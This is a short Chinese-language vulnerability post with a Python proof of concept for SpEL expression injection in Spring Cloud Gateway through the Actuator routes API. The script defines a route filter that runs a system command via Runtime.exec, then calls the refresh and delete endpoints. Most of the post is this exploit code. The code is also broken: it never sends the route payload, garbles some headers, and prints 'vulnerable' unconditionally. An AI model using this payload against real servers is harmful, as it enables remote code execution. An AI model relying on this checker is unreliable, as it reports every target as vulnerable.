Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。
漏洞环境:docker run -d -p 8080:8080 vulhub/spring-cloud-gateway:3.1.0
访问8080端口:
POC:import requests
import json
import re
#添加路由
print("cve")
url_host = input("请输入要测试的地址:")
data = {
"id": "hacktest",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/json',
'Connection': 'close',
'Accept': '**',
'Accept-Language': 'en',
}
url = url_host + "/actuator/gateway/refresh"
res = requests.post(url=url,headers=headers)
print(res.text)
print(res.status_code)
#执行过程
url = url_host + "/actuator/gateway/routes/hacktest"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '0',
'Connection': 'close',
'Accept': '**',
'Accept-Language': 'en',
}
res = requests.delete(url=url,headers=headers)
print(res.text)
print(res.status_code)
#最后一步刷新路由
url = url_host + "/actuator/gateway/refresh"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'close',
'Content-Length': '0',
'Accept': '*/*',
'Accept-Language': 'en',
}
res = requests.post(url=url,headers=headers)
print(res.text)
print(res.status_code)
print("存在漏洞")
可以执行id命令,就代表存在,反之就不存在。
